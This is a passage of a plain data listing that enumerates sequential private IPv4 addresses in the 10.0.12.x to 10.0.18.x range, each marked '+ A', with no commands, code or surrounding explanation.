10.0.12.236 + A 10.0.12.237 + A 10.0.12.238 + A 10.0.12.239 + A 10.0.12.240 + A 10.0.12.241 + A 10.0.12.242 + A 10.0.12.243 + A 10.0.12.244 + A 10.0.12.245 + A 10.0.12.246 + A 10.0.12.247 + A 10.0.12.248 + A 10.0.12.249 + A 10.0.12.250 + A 10.0.12.251 + A 10.0.12.252 + A 10.0.12.253 + A 10.0.12.254 + A 10.0.12.255 + A 10.0.13.0 + A 10.0.13.1 + A 10.0.13.2 + A 10.0.13.3 + A 10.0.13.4 + A 10.0.13.5 + A 10.0.13.6 + A 10.0.13.7 + A 10.0.13.8 + A 10.0.13.9 + A 10.0.13.10 + A 10.0.13.11 + A 10.0.13.12 + A 10.0.13.13 + A 10.0.13.14 + A 10.0.13.15 + A 10.0.13.16 + A 10.0.13.17 + A 10.0.13.18 + A 10.0.13.19 + A 10.0.13.20 + A 10.0.13.21 + A 10.0.13.22 + A 10.0.13.23 + A 10.0.13.24 + A 10.0.13.25 + A 10.0.13.26 + A 10.0.13.27 + A 10.0.13.28 + A 10.0.13.29 + A 10.0.13.30 + A 10.0.13.31 + A 10.0.13.32 + A 10.0.13.33 + A 10.0.13.34 + A 10.0.13.35 + A 10.0.13.36 + A 10.0.13.37 + A 10.0.13.38 + A 10.0.13.39 + A 10.0.13.40 + A 10.0.13.41 + A 10.0.13.42 + A 10.0.13.43 + A 10.0.13.44 + A 10.0.13.45 + A 10.0.13.46 + A 10.0.13.47 + A 10.0.13.48 + A 10.0.13.49 + A 10.0.13.50 + A 10.0.13.51 + A 10.0.13.52 + A 10.0.13.53 + A 10.0.13.54 + A 10.0.13.55 + A 10.0.13.56 + A 10.0.13.57 + A 10.0.13.58 + A 10.0.13.59 + A 10.0.13.60 + A 10.0.13.61 + A 10.0.13.62 + A 10.0.13.63 + A 10.0.13.64 + A 10.0.13.65 + A 10.0.13.66 + A 10.0.13.67 + A 10.0.13.68 + A 10.0.13.69 + A 10.0.13.70 + A 10.0.13.71 + A 10.0.13.72 + A 10.0.13.73 + A 10.0.13.74 + A 10.0.13.75 + A 10.0.13.76 + A 10.0.13.77 + A 10.0.13.78 + A 10.0.13.79 + A 10.0.13.80 + A 10.0.13.81 + A 10.0.13.82 + A 10.0.13.83 + A 10.0.13.84 + A 10.0.13.85 + A 10.0.13.86 + A 10.0.13.87 + A 10.0.13.88 + A 10.0.13.89 + A 10.0.13.90 + A 10.0.13.91 + A 10.0.13.92 + A 10.0.13.93 + A 10.0.13.94 + A 10.0.13.95 + A 10.0.13.96 + A 10.0.13.97 + A 10.0.13.98 + A 10.0.13.99 + A 10.0.13.100 + A 10.0.13.101 + A 10.0.13.102 + A 10.0.13.103 + A 10.0.13.104 + A 10.0.13.105 + A 10.0.13.106 + A 10.0.13.107 + A 10.0.13.108 + A 10.0.13.109 + A 10.0.13.110 + A 10.0.13.111 + A 10.0.13.112 + A 10.0.13.113 + A 10.0.13.114 + A 10.0.13.115 + A 10.0.13.116 + A 10.0.13.117 + A 10.0.13.118 + A 10.0.13.119 + A 10.0.13.120 + A 10.0.13.121 + A 10.0.13.122 + A 10.0.13.123 + A 10.0.13.124 + A 10.0.13.125 + A 10.0.13.126 + A 10.0.13.127 + A 10.0.13.128 + A 10.0.13.129 + A 10.0.13.130 + A 10.0.13.131 + A 10.0.13.132 + A 10.0.13.133 + A 10.0.13.134 + A 10.0.13.135 + A 10.0.13.136 + A 10.0.13.137 + A 10.0.13.138 + A 10.0.13.139 + A 10.0.13.140 + A 10.0.13.141 + A 10.0.13.142 + A 10.0.13.143 + A 10.0.13.144 + A 10.0.13.145 + A 10.0.13.146 + A 10.0.13.147 + A 10.0.13.148 + A 10.0.13.149 + A 10.0.13.150 + A 10.0.13.151 + A 10.0.13.152 + A 10.0.13.153 + A 10.0.13.154 + A 10.0.13.155 + A 10.0.13.156 + A 10.0.13.157 + A 10.0.13.158 + A 10.0.13.159 + A 10.0.13.160 + A 10.0.13.161 + A 10.0.13.162 + A 10.0.13.163 + A 10.0.13.164 + A 10.0.13.165 + A 10.0.13.166 + A 10.0.13.167 + A 10.0.13.168 + A 10.0.13.169 + A 10.0.13.170 + A 10.0.13.171 + A 10.0.13.172 + A 10.0.13.173 + A 10.0.13.174 + A 10.0.13.175 + A 10.0.13.176 + A 10.0.13.177 + A 10.0.13.178 + A 10.0.13.179 + A 10.0.13.180 + A 10.0.13.181 + A 10.0.13.182 + A 10.0.13.183 + A 10.0.13.184 + A 10.0.13.185 + A 10.0.13.186 + A 10.0.13.187 + A 10.0.13.188 + A 10.0.13.189 + A 10.0.13.190 + A 10.0.13.191 + A 10.0.13.192 + A 10.0.13.193 + A 10.0.13.194 + A 10.0.13.195 + A 10.0.13.196 + A 10.0.13.197 + A 10.0.13.198 + A 10.0.13.199 + A 10.0.13.200 + A 10.0.13.201 + A 10.0.13.202 + A 10.0.13.203 + A 10.0.13.204 + A 10.0.13.205 + A 10.0.13.206 + A 10.0.13.207 + A 10.0.13.208 + A 10.0.13.209 + A 10.0.13.210 + A 10.0.13.211 + A 10.0.13.212 + A 10.0.13.213 + A 10.0.13.214 + A 10.0.13.215 + A 10.0.13.216 + A 10.0.13.217 + A 10.0.13.218 + A 10.0.13.219 + A 10.0.13.220 + A 10.0.13.221 + A 10.0.13.222 + A 10.0.13.223 + A 10.0.13.224 + A 10.0.13.225 + A 10.0.13.226 + A 10.0.13.227 + A 10.0.13.228 + A 10.0.13.229 + A 10.0.13.230 + A 10.0.13.231 + A 10.0.13.232 + A 10.0.13.233 + A 10.0.13.234 + A 10.0.13.235 + A 10.0.13.236 + A 10.0.13.237 + A 10.0.13.238 + A 10.0.13.239 + A 10.0.13.240 + A 10.0.13.241 + A 10.0.13.242 + A 10.0.13.243 + A 10.0.13.244 + A 10.0.13.245 + A 10.0.13.246 + A 10.0.13.247 + A 10.0.13.248 + A 10.0.13.249 + A 10.0.13.250 + A 10.0.13.251 + A 10.0.13.252 + A 10.0.13.253 + A 10.0.13.254 + A 10.0.13.255 + A 10.0.14.0 + A 10.0.14.1 + A 10.0.14.2 + A 10.0.14.3 + A 10.0.14.4 + A 10.0.14.5 + A 10.0.14.6 + A 10.0.14.7 + A 10.0.14.8 + A 10.0.14.9 + A 10.0.14.10 + A 10.0.14.11 + A 10.0.14.12 + A 10.0.14.13 + A 10.0.14.14 + A 10.0.14.15 + A 10.0.14.16 + A 10.0.14.17 + A 10.0.14.18 + A 10.0.14.19 + A 10.0.14.20 + A 10.0.14.21 + A 10.0.14.22 + A 10.0.14.23 + A 10.0.14.24 + A 10.0.14.25 + A 10.0.14.26 + A 10.0.14.27 + A 10.0.14.28 + A 10.0.14.29 + A 10.0.14.30 + A 10.0.14.31 + A 10.0.14.32 + A 10.0.14.33 + A 10.0.14.34 + A 10.0.14.35 + A 10.0.14.36 + A 10.0.14.37 + A 10.0.14.38 + A 10.0.14.39 + A 10.0.14.40 + A 10.0.14.41 + A 10.0.14.42 + A 10.0.14.43 + A 10.0.14.44 + A 10.0.14.45 + A 10.0.14.46 + A 10.0.14.47 + A 10.0.14.48 + A 10.0.14.49 + A 10.0.14.50 + A 10.0.14.51 + A 10.0.14.52 + A 10.0.14.53 + A 10.0.14.54 + A 10.0.14.55 + A 10.0.14.56 + A 10.0.14.57 + A 10.0.14.58 + A 10.0.14.59 + A 10.0.14.60 + A 10.0.14.61 + A 10.0.14.62 + A 10.0.14.63 + A 10.0.14.64 + A 10.0.14.65 + A 10.0.14.66 + A 10.0.14.67 + A 10.0.14.68 + A 10.0.14.69 + A 10.0.14.70 + A 10.0.14.71 + A 10.0.14.72 + A 10.0.14.73 + A 10.0.14.74 + A 10.0.14.75 + A 10.0.14.76 + A 10.0.14.77 + A 10.0.14.78 + A 10.0.14.79 + A 10.0.14.80 + A 10.0.14.81 + A 10.0.14.82 + A 10.0.14.83 + A 10.0.14.84 + A 10.0.14.85 + A 10.0.14.86 + A 10.0.14.87 + A 10.0.14.88 + A 10.0.14.89 + A 10.0.14.90 + A 10.0.14.91 + A 10.0.14.92 + A 10.0.14.93 + A 10.0.14.94 + A 10.0.14.95 + A 10.0.14.96 + A 10.0.14.97 + A 10.0.14.98 + A 10.0.14.99 + A 10.0.14.100 + A 10.0.14.101 + A 10.0.14.102 + A 10.0.14.103 + A 10.0.14.104 + A 10.0.14.105 + A 10.0.14.106 + A 10.0.14.107 + A 10.0.14.108 + A 10.0.14.109 + A 10.0.14.110 + A 10.0.14.111 + A 10.0.14.112 + A 10.0.14.113 + A 10.0.14.114 + A 10.0.14.115 + A 10.0.14.116 + A 10.0.14.117 + A 10.0.14.118 + A 10.0.14.119 + A 10.0.14.120 + A 10.0.14.121 + A 10.0.14.122 + A 10.0.14.123 + A 10.0.14.124 + A 10.0.14.125 + A 10.0.14.126 + A 10.0.14.127 + A 10.0.14.128 + A 10.0.14.129 + A 10.0.14.130 + A 10.0.14.131 + A 10.0.14.132 + A 10.0.14.133 + A 10.0.14.134 + A 10.0.14.135 + A 10.0.14.136 + A 10.0.14.137 + A 10.0.14.138 + A 10.0.14.139 + A 10.0.14.140 + A 10.0.14.141 + A 10.0.14.142 + A 10.0.14.143 + A 10.0.14.144 + A 10.0.14.145 + A 10.0.14.146 + A 10.0.14.147 + A 10.0.14.148 + A 10.0.14.149 + A 10.0.14.150 + A 10.0.14.151 + A 10.0.14.152 + A 10.0.14.153 + A 10.0.14.154 + A 10.0.14.155 + A 10.0.14.156 + A 10.0.14.157 + A 10.0.14.158 + A 10.0.14.159 + A 10.0.14.160 + A 10.0.14.161 + A 10.0.14.162 + A 10.0.14.163 + A 10.0.14.164 + A 10.0.14.165 + A 10.0.14.166 + A 10.0.14.167 + A 10.0.14.168 + A 10.0.14.169 + A 10.0.14.170 + A 10.0.14.171 + A 10.0.14.172 + A 10.0.14.173 + A 10.0.14.174 + A 10.0.14.175 + A 10.0.14.176 + A 10.0.14.177 + A 10.0.14.178 + A 10.0.14.179 + A 10.0.14.180 + A 10.0.14.181 + A 10.0.14.182 + A 10.0.14.183 + A 10.0.14.184 + A 10.0.14.185 + A 10.0.14.186 + A 10.0.14.187 + A 10.0.14.188 + A 10.0.14.189 + A 10.0.14.190 + A 10.0.14.191 + A 10.0.14.192 + A 10.0.14.193 + A 10.0.14.194 + A 10.0.14.195 + A 10.0.14.196 + A 10.0.14.197 + A 10.0.14.198 + A 10.0.14.199 + A 10.0.14.200 + A 10.0.14.201 + A 10.0.14.202 + A 10.0.14.203 + A 10.0.14.204 + A 10.0.14.205 + A 10.0.14.206 + A 10.0.14.207 + A 10.0.14.208 + A 10.0.14.209 + A 10.0.14.210 + A 10.0.14.211 + A 10.0.14.212 + A 10.0.14.213 + A 10.0.14.214 + A 10.0.14.215 + A 10.0.14.216 + A 10.0.14.217 + A 10.0.14.218 + A 10.0.14.219 + A 10.0.14.220 + A 10.0.14.221 + A 10.0.14.222 + A 10.0.14.223 + A 10.0.14.224 + A 10.0.14.225 + A 10.0.14.226 + A 10.0.14.227 + A 10.0.14.228 + A 10.0.14.229 + A 10.0.14.230 + A 10.0.14.231 + A 10.0.14.232 + A 10.0.14.233 + A 10.0.14.234 + A 10.0.14.235 + A 10.0.14.236 + A 10.0.14.237 + A 10.0.14.238 + A 10.0.14.239 + A 10.0.14.240 + A 10.0.14.241 + A 10.0.14.242 + A 10.0.14.243 + A 10.0.14.244 + A 10.0.14.245 + A 10.0.14.246 + A 10.0.14.247 + A 10.0.14.248 + A 10.0.14.249 + A 10.0.14.250 + A 10.0.14.251 + A 10.0.14.252 + A 10.0.14.253 + A 10.0.14.254 + A 10.0.14.255 + A 10.0.15.0 + A 10.0.15.1 + A 10.0.15.2 + A 10.0.15.3 + A 10.0.15.4 + A 10.0.15.5 + A 10.0.15.6 + A 10.0.15.7 + A 10.0.15.8 + A 10.0.15.9 + A 10.0.15.10 + A 10.0.15.11 + A 10.0.15.12 + A 10.0.15.13 + A 10.0.15.14 + A 10.0.15.15 + A 10.0.15.16 + A 10.0.15.17 + A 10.0.15.18 + A 10.0.15.19 + A 10.0.15.20 + A 10.0.15.21 + A 10.0.15.22 + A 10.0.15.23 + A 10.0.15.24 + A 10.0.15.25 + A 10.0.15.26 + A 10.0.15.27 + A 10.0.15.28 + A 10.0.15.29 + A 10.0.15.30 + A 10.0.15.31 + A 10.0.15.32 + A 10.0.15.33 + A 10.0.15.34 + A 10.0.15.35 + A 10.0.15.36 + A 10.0.15.37 + A 10.0.15.38 + A 10.0.15.39 + A 10.0.15.40 + A 10.0.15.41 + A 10.0.15.42 + A 10.0.15.43 + A 10.0.15.44 + A 10.0.15.45 + A 10.0.15.46 + A 10.0.15.47 + A 10.0.15.48 + A 10.0.15.49 + A 10.0.15.50 + A 10.0.15.51 + A 10.0.15.52 + A 10.0.15.53 + A 10.0.15.54 + A 10.0.15.55 + A 10.0.15.56 + A 10.0.15.57 + A 10.0.15.58 + A 10.0.15.59 + A 10.0.15.60 + A 10.0.15.61 + A 10.0.15.62 + A 10.0.15.63 + A 10.0.15.64 + A 10.0.15.65 + A 10.0.15.66 + A 10.0.15.67 + A 10.0.15.68 + A 10.0.15.69 + A 10.0.15.70 + A 10.0.15.71 + A 10.0.15.72 + A 10.0.15.73 + A 10.0.15.74 + A 10.0.15.75 + A 10.0.15.76 + A 10.0.15.77 + A 10.0.15.78 + A 10.0.15.79 + A 10.0.15.80 + A 10.0.15.81 + A 10.0.15.82 + A 10.0.15.83 + A 10.0.15.84 + A 10.0.15.85 + A 10.0.15.86 + A 10.0.15.87 + A 10.0.15.88 + A 10.0.15.89 + A 10.0.15.90 + A 10.0.15.91 + A 10.0.15.92 + A 10.0.15.93 + A 10.0.15.94 + A 10.0.15.95 + A 10.0.15.96 + A 10.0.15.97 + A 10.0.15.98 + A 10.0.15.99 + A 10.0.15.100 + A 10.0.15.101 + A 10.0.15.102 + A 10.0.15.103 + A 10.0.15.104 + A 10.0.15.105 + A 10.0.15.106 + A 10.0.15.107 + A 10.0.15.108 + A 10.0.15.109 + A 10.0.15.110 + A 10.0.15.111 + A 10.0.15.112 + A 10.0.15.113 + A 10.0.15.114 + A 10.0.15.115 + A 10.0.15.116 + A 10.0.15.117 + A 10.0.15.118 + A 10.0.15.119 + A 10.0.15.120 + A 10.0.15.121 + A 10.0.15.122 + A 10.0.15.123 + A 10.0.15.124 + A 10.0.15.125 + A 10.0.15.126 + A 10.0.15.127 + A 10.0.15.128 + A 10.0.15.129 + A 10.0.15.130 + A 10.0.15.131 + A 10.0.15.132 + A 10.0.15.133 + A 10.0.15.134 + A 10.0.15.135 + A 10.0.15.136 + A 10.0.15.137 + A 10.0.15.138 + A 10.0.15.139 + A 10.0.15.140 + A 10.0.15.141 + A 10.0.15.142 + A 10.0.15.143 + A 10.0.15.144 + A 10.0.15.145 + A 10.0.15.146 + A 10.0.15.147 + A 10.0.15.148 + A 10.0.15.149 + A 10.0.15.150 + A 10.0.15.151 + A 10.0.15.152 + A 10.0.15.153 + A 10.0.15.154 + A 10.0.15.155 + A 10.0.15.156 + A 10.0.15.157 + A 10.0.15.158 + A 10.0.15.159 + A 10.0.15.160 + A 10.0.15.161 + A 10.0.15.162 + A 10.0.15.163 + A 10.0.15.164 + A 10.0.15.165 + A 10.0.15.166 + A 10.0.15.167 + A 10.0.15.168 + A 10.0.15.169 + A 10.0.15.170 + A 10.0.15.171 + A 10.0.15.172 + A 10.0.15.173 + A 10.0.15.174 + A 10.0.15.175 + A 10.0.15.176 + A 10.0.15.177 + A 10.0.15.178 + A 10.0.15.179 + A 10.0.15.180 + A 10.0.15.181 + A 10.0.15.182 + A 10.0.15.183 + A 10.0.15.184 + A 10.0.15.185 + A 10.0.15.186 + A 10.0.15.187 + A 10.0.15.188 + A 10.0.15.189 + A 10.0.15.190 + A 10.0.15.191 + A 10.0.15.192 + A 10.0.15.193 + A 10.0.15.194 + A 10.0.15.195 + A 10.0.15.196 + A 10.0.15.197 + A 10.0.15.198 + A 10.0.15.199 + A 10.0.15.200 + A 10.0.15.201 + A 10.0.15.202 + A 10.0.15.203 + A 10.0.15.204 + A 10.0.15.205 + A 10.0.15.206 + A 10.0.15.207 + A 10.0.15.208 + A 10.0.15.209 + A 10.0.15.210 + A 10.0.15.211 + A 10.0.15.212 + A 10.0.15.213 + A 10.0.15.214 + A 10.0.15.215 + A 10.0.15.216 + A 10.0.15.217 + A 10.0.15.218 + A 10.0.15.219 + A 10.0.15.220 + A 10.0.15.221 + A 10.0.15.222 + A 10.0.15.223 + A 10.0.15.224 + A 10.0.15.225 + A 10.0.15.226 + A 10.0.15.227 + A 10.0.15.228 + A 10.0.15.229 + A 10.0.15.230 + A 10.0.15.231 + A 10.0.15.232 + A 10.0.15.233 + A 10.0.15.234 + A 10.0.15.235 + A 10.0.15.236 + A 10.0.15.237 + A 10.0.15.238 + A 10.0.15.239 + A 10.0.15.240 + A 10.0.15.241 + A 10.0.15.242 + A 10.0.15.243 + A 10.0.15.244 + A 10.0.15.245 + A 10.0.15.246 + A 10.0.15.247 + A 10.0.15.248 + A 10.0.15.249 + A 10.0.15.250 + A 10.0.15.251 + A 10.0.15.252 + A 10.0.15.253 + A 10.0.15.254 + A 10.0.15.255 + A 10.0.16.0 + A 10.0.16.1 + A 10.0.16.2 + A 10.0.16.3 + A 10.0.16.4 + A 10.0.16.5 + A 10.0.16.6 + A 10.0.16.7 + A 10.0.16.8 + A 10.0.16.9 + A 10.0.16.10 + A 10.0.16.11 + A 10.0.16.12 + A 10.0.16.13 + A 10.0.16.14 + A 10.0.16.15 + A 10.0.16.16 + A 10.0.16.17 + A 10.0.16.18 + A 10.0.16.19 + A 10.0.16.20 + A 10.0.16.21 + A 10.0.16.22 + A 10.0.16.23 + A 10.0.16.24 + A 10.0.16.25 + A 10.0.16.26 + A 10.0.16.27 + A 10.0.16.28 + A 10.0.16.29 + A 10.0.16.30 + A 10.0.16.31 + A 10.0.16.32 + A 10.0.16.33 + A 10.0.16.34 + A 10.0.16.35 + A 10.0.16.36 + A 10.0.16.37 + A 10.0.16.38 + A 10.0.16.39 + A 10.0.16.40 + A 10.0.16.41 + A 10.0.16.42 + A 10.0.16.43 + A 10.0.16.44 + A 10.0.16.45 + A 10.0.16.46 + A 10.0.16.47 + A 10.0.16.48 + A 10.0.16.49 + A 10.0.16.50 + A 10.0.16.51 + A 10.0.16.52 + A 10.0.16.53 + A 10.0.16.54 + A 10.0.16.55 + A 10.0.16.56 + A 10.0.16.57 + A 10.0.16.58 + A 10.0.16.59 + A 10.0.16.60 + A 10.0.16.61 + A 10.0.16.62 + A 10.0.16.63 + A 10.0.16.64 + A 10.0.16.65 + A 10.0.16.66 + A 10.0.16.67 + A 10.0.16.68 + A 10.0.16.69 + A 10.0.16.70 + A 10.0.16.71 + A 10.0.16.72 + A 10.0.16.73 + A 10.0.16.74 + A 10.0.16.75 + A 10.0.16.76 + A 10.0.16.77 + A 10.0.16.78 + A 10.0.16.79 + A 10.0.16.80 + A 10.0.16.81 + A 10.0.16.82 + A 10.0.16.83 + A 10.0.16.84 + A 10.0.16.85 + A 10.0.16.86 + A 10.0.16.87 + A 10.0.16.88 + A 10.0.16.89 + A 10.0.16.90 + A 10.0.16.91 + A 10.0.16.92 + A 10.0.16.93 + A 10.0.16.94 + A 10.0.16.95 + A 10.0.16.96 + A 10.0.16.97 + A 10.0.16.98 + A 10.0.16.99 + A 10.0.16.100 + A 10.0.16.101 + A 10.0.16.102 + A 10.0.16.103 + A 10.0.16.104 + A 10.0.16.105 + A 10.0.16.106 + A 10.0.16.107 + A 10.0.16.108 + A 10.0.16.109 + A 10.0.16.110 + A 10.0.16.111 + A 10.0.16.112 + A 10.0.16.113 + A 10.0.16.114 + A 10.0.16.115 + A 10.0.16.116 + A 10.0.16.117 + A 10.0.16.118 + A 10.0.16.119 + A 10.0.16.120 + A 10.0.16.121 + A 10.0.16.122 + A 10.0.16.123 + A 10.0.16.124 + A 10.0.16.125 + A 10.0.16.126 + A 10.0.16.127 + A 10.0.16.128 + A 10.0.16.129 + A 10.0.16.130 + A 10.0.16.131 + A 10.0.16.132 + A 10.0.16.133 + A 10.0.16.134 + A 10.0.16.135 + A 10.0.16.136 + A 10.0.16.137 + A 10.0.16.138 + A 10.0.16.139 + A 10.0.16.140 + A 10.0.16.141 + A 10.0.16.142 + A 10.0.16.143 + A 10.0.16.144 + A 10.0.16.145 + A 10.0.16.146 + A 10.0.16.147 + A 10.0.16.148 + A 10.0.16.149 + A 10.0.16.150 + A 10.0.16.151 + A 10.0.16.152 + A 10.0.16.153 + A 10.0.16.154 + A 10.0.16.155 + A 10.0.16.156 + A 10.0.16.157 + A 10.0.16.158 + A 10.0.16.159 + A 10.0.16.160 + A 10.0.16.161 + A 10.0.16.162 + A 10.0.16.163 + A 10.0.16.164 + A 10.0.16.165 + A 10.0.16.166 + A 10.0.16.167 + A 10.0.16.168 + A 10.0.16.169 + A 10.0.16.170 + A 10.0.16.171 + A 10.0.16.172 + A 10.0.16.173 + A 10.0.16.174 + A 10.0.16.175 + A 10.0.16.176 + A 10.0.16.177 + A 10.0.16.178 + A 10.0.16.179 + A 10.0.16.180 + A 10.0.16.181 + A 10.0.16.182 + A 10.0.16.183 + A 10.0.16.184 + A 10.0.16.185 + A 10.0.16.186 + A 10.0.16.187 + A 10.0.16.188 + A 10.0.16.189 + A 10.0.16.190 + A 10.0.16.191 + A 10.0.16.192 + A 10.0.16.193 + A 10.0.16.194 + A 10.0.16.195 + A 10.0.16.196 + A 10.0.16.197 + A 10.0.16.198 + A 10.0.16.199 + A 10.0.16.200 + A 10.0.16.201 + A 10.0.16.202 + A 10.0.16.203 + A 10.0.16.204 + A 10.0.16.205 + A 10.0.16.206 + A 10.0.16.207 + A 10.0.16.208 + A 10.0.16.209 + A 10.0.16.210 + A 10.0.16.211 + A 10.0.16.212 + A 10.0.16.213 + A 10.0.16.214 + A 10.0.16.215 + A 10.0.16.216 + A 10.0.16.217 + A 10.0.16.218 + A 10.0.16.219 + A 10.0.16.220 + A 10.0.16.221 + A 10.0.16.222 + A 10.0.16.223 + A 10.0.16.224 + A 10.0.16.225 + A 10.0.16.226 + A 10.0.16.227 + A 10.0.16.228 + A 10.0.16.229 + A 10.0.16.230 + A 10.0.16.231 + A 10.0.16.232 + A 10.0.16.233 + A 10.0.16.234 + A 10.0.16.235 + A 10.0.16.236 + A 10.0.16.237 + A 10.0.16.238 + A 10.0.16.239 + A 10.0.16.240 + A 10.0.16.241 + A 10.0.16.242 + A 10.0.16.243 + A 10.0.16.244 + A 10.0.16.245 + A 10.0.16.246 + A 10.0.16.247 + A 10.0.16.248 + A 10.0.16.249 + A 10.0.16.250 + A 10.0.16.251 + A 10.0.16.252 + A 10.0.16.253 + A 10.0.16.254 + A 10.0.16.255 + A 10.0.17.0 + A 10.0.17.1 + A 10.0.17.2 + A 10.0.17.3 + A 10.0.17.4 + A 10.0.17.5 + A 10.0.17.6 + A 10.0.17.7 + A 10.0.17.8 + A 10.0.17.9 + A 10.0.17.10 + A 10.0.17.11 + A 10.0.17.12 + A 10.0.17.13 + A 10.0.17.14 + A 10.0.17.15 + A 10.0.17.16 + A 10.0.17.17 + A 10.0.17.18 + A 10.0.17.19 + A 10.0.17.20 + A 10.0.17.21 + A 10.0.17.22 + A 10.0.17.23 + A 10.0.17.24 + A 10.0.17.25 + A 10.0.17.26 + A 10.0.17.27 + A 10.0.17.28 + A 10.0.17.29 + A 10.0.17.30 + A 10.0.17.31 + A 10.0.17.32 + A 10.0.17.33 + A 10.0.17.34 + A 10.0.17.35 + A 10.0.17.36 + A 10.0.17.37 + A 10.0.17.38 + A 10.0.17.39 + A 10.0.17.40 + A 10.0.17.41 + A 10.0.17.42 + A 10.0.17.43 + A 10.0.17.44 + A 10.0.17.45 + A 10.0.17.46 + A 10.0.17.47 + A 10.0.17.48 + A 10.0.17.49 + A 10.0.17.50 + A 10.0.17.51 + A 10.0.17.52 + A 10.0.17.53 + A 10.0.17.54 + A 10.0.17.55 + A 10.0.17.56 + A 10.0.17.57 + A 10.0.17.58 + A 10.0.17.59 + A 10.0.17.60 + A 10.0.17.61 + A 10.0.17.62 + A 10.0.17.63 + A 10.0.17.64 + A 10.0.17.65 + A 10.0.17.66 + A 10.0.17.67 + A 10.0.17.68 + A 10.0.17.69 + A 10.0.17.70 + A 10.0.17.71 + A 10.0.17.72 + A 10.0.17.73 + A 10.0.17.74 + A 10.0.17.75 + A 10.0.17.76 + A 10.0.17.77 + A 10.0.17.78 + A 10.0.17.79 + A 10.0.17.80 + A 10.0.17.81 + A 10.0.17.82 + A 10.0.17.83 + A 10.0.17.84 + A 10.0.17.85 + A 10.0.17.86 + A 10.0.17.87 + A 10.0.17.88 + A 10.0.17.89 + A 10.0.17.90 + A 10.0.17.91 + A 10.0.17.92 + A 10.0.17.93 + A 10.0.17.94 + A 10.0.17.95 + A 10.0.17.96 + A 10.0.17.97 + A 10.0.17.98 + A 10.0.17.99 + A 10.0.17.100 + A 10.0.17.101 + A 10.0.17.102 + A 10.0.17.103 + A 10.0.17.104 + A 10.0.17.105 + A 10.0.17.106 + A 10.0.17.107 + A 10.0.17.108 + A 10.0.17.109 + A 10.0.17.110 + A 10.0.17.111 + A 10.0.17.112 + A 10.0.17.113 + A 10.0.17.114 + A 10.0.17.115 + A 10.0.17.116 + A 10.0.17.117 + A 10.0.17.118 + A 10.0.17.119 + A 10.0.17.120 + A 10.0.17.121 + A 10.0.17.122 + A 10.0.17.123 + A 10.0.17.124 + A 10.0.17.125 + A 10.0.17.126 + A 10.0.17.127 + A 10.0.17.128 + A 10.0.17.129 + A 10.0.17.130 + A 10.0.17.131 + A 10.0.17.132 + A 10.0.17.133 + A 10.0.17.134 + A 10.0.17.135 + A 10.0.17.136 + A 10.0.17.137 + A 10.0.17.138 + A 10.0.17.139 + A 10.0.17.140 + A 10.0.17.141 + A 10.0.17.142 + A 10.0.17.143 + A 10.0.17.144 + A 10.0.17.145 + A 10.0.17.146 + A 10.0.17.147 + A 10.0.17.148 + A 10.0.17.149 + A 10.0.17.150 + A 10.0.17.151 + A 10.0.17.152 + A 10.0.17.153 + A 10.0.17.154 + A 10.0.17.155 + A 10.0.17.156 + A 10.0.17.157 + A 10.0.17.158 + A 10.0.17.159 + A 10.0.17.160 + A 10.0.17.161 + A 10.0.17.162 + A 10.0.17.163 + A 10.0.17.164 + A 10.0.17.165 + A 10.0.17.166 + A 10.0.17.167 + A 10.0.17.168 + A 10.0.17.169 + A 10.0.17.170 + A 10.0.17.171 + A 10.0.17.172 + A 10.0.17.173 + A 10.0.17.174 + A 10.0.17.175 + A 10.0.17.176 + A 10.0.17.177 + A 10.0.17.178 + A 10.0.17.179 + A 10.0.17.180 + A 10.0.17.181 + A 10.0.17.182 + A 10.0.17.183 + A 10.0.17.184 + A 10.0.17.185 + A 10.0.17.186 + A 10.0.17.187 + A 10.0.17.188 + A 10.0.17.189 + A 10.0.17.190 + A 10.0.17.191 + A 10.0.17.192 + A 10.0.17.193 + A 10.0.17.194 + A 10.0.17.195 + A 10.0.17.196 + A 10.0.17.197 + A 10.0.17.198 + A 10.0.17.199 + A 10.0.17.200 + A 10.0.17.201 + A 10.0.17.202 + A 10.0.17.203 + A 10.0.17.204 + A 10.0.17.205 + A 10.0.17.206 + A 10.0.17.207 + A 10.0.17.208 + A 10.0.17.209 + A 10.0.17.210 + A 10.0.17.211 + A 10.0.17.212 + A 10.0.17.213 + A 10.0.17.214 + A 10.0.17.215 + A 10.0.17.216 + A 10.0.17.217 + A 10.0.17.218 + A 10.0.17.219 + A 10.0.17.220 + A 10.0.17.221 + A 10.0.17.222 + A 10.0.17.223 + A 10.0.17.224 + A 10.0.17.225 + A 10.0.17.226 + A 10.0.17.227 + A 10.0.17.228 + A 10.0.17.229 + A 10.0.17.230 + A 10.0.17.231 + A 10.0.17.232 + A 10.0.17.233 + A 10.0.17.234 + A 10.0.17.235 + A 10.0.17.236 + A 10.0.17.237 + A 10.0.17.238 + A 10.0.17.239 + A 10.0.17.240 + A 10.0.17.241 + A 10.0.17.242 + A 10.0.17.243 + A 10.0.17.244 + A 10.0.17.245 + A 10.0.17.246 + A 10.0.17.247 + A 10.0.17.248 + A 10.0.17.249 + A 10.0.17.250 + A 10.0.17.251 + A 10.0.17.252 + A 10.0.17.253 + A 10.0.17.254 + A 10.0.17.255 + A 10.0.18.0 + A 10.0.18.1 + A 10.0.18.2 + A 10.0.18.3 + A 10.0.18.4 + A 10.0.18.5 + A 10.0.18.6 + A 10.0.18.7 + A 10.0.18.8 + A 10.0.18.9 + A 10.0.18.10 + A 10.0.18.11 + A 10.0.18.12 + A 10.0.18.13 + A 10.0.18.14 + A 10.0.18.15 + A 10.0.18.16 + A 10.0.18.17 + A 10.0.18.18 + A 10.0.18.19 + A 10.0.18.20 + A 10.0.18.21 + A 10.0.18.22 + A 10.0.18.23 + A 10.0.18.24 + A 10.0.18.25 + A 10.0.18.26 + A 10.0.18.27 + A 10.0.18.28 + A 10.0.18.29 + A 10.0.18.30 + A 10.0.18.31 + A 10.0.18.32 + A 10.0.18.33 + A 10.0.18.34 + A 10.0.18.35 + A 10.0.18.36 + A 10.0.18.37 + A 10.0.18.38 + A 10.0.18.39 + A 10.0.18.40 + A 10.0.18.41 + A 10.0.18.42 + A 10.0.18.43 + A 10.0.18.44 + A 10.0.18.45 + A 10.0.18.46 + A 10.0.18.47 + A 10.0.18.48 + A 10.0.18.49 + A 10.0.18.50 + A 10.0.18.51 + A 10.0.18.52 + A 10.0.18.53 + A 10.0.18.54 + A 10.0.18.55 + A 10.0.18.56 + A 10.0.18.57 + A 10.0.18.58 + A 10.0.18.59 + A 10.0.18.60 + A 10.0.18.61 + A 10.0.18.62 + A 